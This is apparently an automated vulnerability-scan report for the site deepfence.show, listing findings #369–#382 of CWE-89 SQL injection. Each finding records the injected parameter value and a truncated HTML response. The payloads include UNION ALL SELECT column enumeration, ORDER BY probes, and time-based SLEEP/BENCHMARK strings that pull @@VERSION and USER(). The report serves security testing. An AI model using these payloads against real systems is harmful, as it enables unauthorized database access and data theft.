href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter demouser@\ndeepfence.io\nCWE-ID CWE-89\nIssue Number #369Scan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@\ndeepfence.ioUNION ALL SELECT \n1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter demouser@\ndeepfence.io\nCWE-ID CWE-89\nIssue Number #370\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@\ndeepfence.ioORDER BY 10--\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter demouser@\ndeepfence.io\nCWE-ID CWE-89\nIssue Number #371\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@deepfence.io UNION ALL SELECT @@VERSION,USER(),SLEEP(5),\nBENCHMARK(1000000,MD5('A')),NULL,NULL,NULL,NULL,\nNULL,NULL,NULL,NULL,NULL,NULL--\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter demouser@\ndeepfence.io\nCWE-ID CWE-89\nIssue Number #372\nScan SQL Injection\nSeverity ERROREndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@deepfence.io UNION SELECT @@VERSION,SLEEP(5),USER(),\nBENCHMARK(1000000,MD5('A')),5#\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter demouser@\ndeepfence.io\nCWE-ID CWE-89\nIssue Number #373\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@deepfence.io UNION ALL SELECT 'INJ'||'ECT'||'XXX'\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCgAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter demouser@\ndeepfence.io\nCWE-ID CWE-89\nIssue Number #374\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@\ndeepfence.ioORDER BY 23\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter demouser@\ndeepfence.io\nCWE-ID CWE-89\nIssue Number #375\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Valuedemouser@\ndeepfence.ioUNION ALL SELECT \n1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27\n#\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter demouser@\ndeepfence.io\nCWE-ID CWE-89\nIssue Number #376\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@\ndeepfence.io' or sleep(5)='\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]Action Points You may need to remove SQL tokens from the contents of the parameter demouser@\ndeepfence.io\nCWE-ID CWE-89\nIssue Number #377\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@\ndeepfence.ioORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),\n4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter demouser@\ndeepfence.io\nCWE-ID CWE-89\nIssue Number #378\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@deepfence.io UNION ALL SELECT 'INJ'||'ECT'||'XXX'--\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter demouser@\ndeepfence.io\nCWE-ID CWE-89\nIssue Number #379\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@deepfence.io UNION ALL SELECT 'INJ'||'ECT'||'XXX',\n2,3,4,5,6,7,8,9,10,11,12,13,14#\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter demouser@\ndeepfence.io\nCWE-ID CWE-89\nIssue Number #380Scan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@\ndeepfence.ioUNION ALL SELECT \n1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter demouser@\ndeepfence.io\nCWE-ID CWE-89\nIssue Number #381\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@\ndeepfence.ioUNION ALL SELECT 'INJ'||'ECT'||'XXX',\n2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"ze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter demouser@\ndeepfence.io\nCWE-ID CWE-89\nIssue Number #382\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@deepfence.io UNION ALL SELECT 1,2,3\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" 